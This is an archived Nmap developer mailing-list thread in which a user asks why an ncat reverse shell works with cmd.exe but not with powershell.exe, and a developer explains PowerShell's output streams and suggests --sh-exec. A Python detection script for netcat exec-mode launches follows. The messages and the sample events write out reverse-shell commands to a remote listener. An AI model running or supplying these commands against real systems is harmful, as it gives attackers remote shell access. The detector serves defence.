Nmap Development mailing list archives
Re: Netcat powershell bug?
From: Daniel Miller <bonsaiviking () gmail com>
Date: Mon, 23 Jan 2017 07:53:17 -0600
Efrat,

I'm afraid I don't have a solution, but I can guess at the source of the problem: Ncat does execution by redirecting the three primary I/O streams to the TCP connection: stdin, stdout, and stderr. Powershell, on the other hand, has many more output streams. It has streams for progress indication, logging, error, output, and more. Ncat probably is just not handling this properly. Also, if it's anything like some Linux commands (like vi, screen, or anything using ncurses), it can probably read directly from something like a pseudo terminal device, which is not the stdin stream.

I have not tried this, but you could try executing powershell.exe within cmd.exe and see if that solves the streams problem: use --sh-exec instead of -e to do this.

Of course, the canonical answer is to use a feature of Powershell like Powershell Remoting or even use Powershell code itself to do the TCP connection instead of using Ncat or another 3rd-party binary.

Dan

On Sun, Jan 22, 2017 at 7:45 AM, Efrat Rozen <efratrozen1983 () gmail com> wrote:
Hi - I'm having trouble opening a reverse powershell shell using ncat. I'm using the executable version of ncat on client Windows and running the listener on Kali using nc -l command.

When I launch this command on my Windows target:

ncat.exe [ public ip] [port] -e cmd.exe

it opens a cmd reverse shell perfectly on the Kali listener. But when I use:

ncat.exe [ public ip] [port] -e powershell.exe

it just opened the powershell 'welcome' on the Kali listener without any option to type in commands.

Can you please offer some suggestions? I'll be happy to donate as well :)

Thanks.

_______________________________________________
Sent through the dev mailing list
https://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
Current thread:
- Netcat powershell bug? Efrat Rozen (Jan 22)
- Re: Netcat powershell bug? Daniel Miller (Jan 23)
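From the defender's side, the invocation forms discussed in this thread (-e, and the --sh-exec alternative) can be flagged in process-creation logs. This is an added example, not part of the original messages or of Nmap's code; the event tuples, hostnames and the 203.0.113.10 documentation address are constructed, and matching on the image name is an assumption that misses renamed binaries.

```python
import re
import shlex

# Ncat options that run a program with stdin/stdout/stderr tied to the socket.
EXEC_OPTS = {"-e", "--exec", "-c", "--sh-exec", "--lua-exec"}
NETCAT_IMAGES = {"ncat", "nc", "netcat", "ncat.exe", "nc.exe", "netcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash"}

def basename(path):
    """Last path component, lower-cased, for Windows or POSIX separators."""
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()

def exec_target(command_line):
    """Return (option, program) if a netcat-style command line uses an exec
    option, else None. Name-based matching misses renamed binaries."""
    try:
        argv = shlex.split(command_line, posix=False)  # keep backslashes intact
    except ValueError:  # unbalanced quotes: fall back to a whitespace split
        argv = command_line.split()
    if not argv or basename(argv[0]) not in NETCAT_IMAGES:
        return None
    for i, arg in enumerate(argv[1:], start=1):
        opt, _, inline = arg.partition("=")
        # Heuristic: a short-option cluster such as -nve ends in the exec flag.
        if re.fullmatch(r"-[A-Za-z0-9]+[ec]", opt):
            opt = "-" + opt[-1]
        if opt in EXEC_OPTS:
            value = inline or (argv[i + 1] if i + 1 < len(argv) else "")
            return opt, value.strip('"')
    return None

def scan(events):
    """events: (host, command_line) pairs; returns one tuple per exec launch."""
    findings = []
    for host, cmdline in events:
        hit = exec_target(cmdline)
        if hit:
            words = hit[1].split()
            spawns_shell = bool(words) and basename(words[0]) in SHELLS
            findings.append((host, hit[0], hit[1], spawns_shell))
    return findings

# Constructed sample events (hostnames and address are made up).
SAMPLE = [
    ("ws01", r"ncat.exe 203.0.113.10 4444 -e cmd.exe"),
    ("ws02", r'"C:\Tools\ncat.exe" 203.0.113.10 4444 -e powershell.exe'),
    ("ws03", r"ncat.exe 203.0.113.10 4444 --sh-exec powershell.exe"),
    ("kali", "nc -l 4444"),
    ("ws04", r"notepad.exe -e notes.txt"),
]
```

Calling `scan(SAMPLE)` returns the three exec-mode launches and skips the plain listener and the unrelated process.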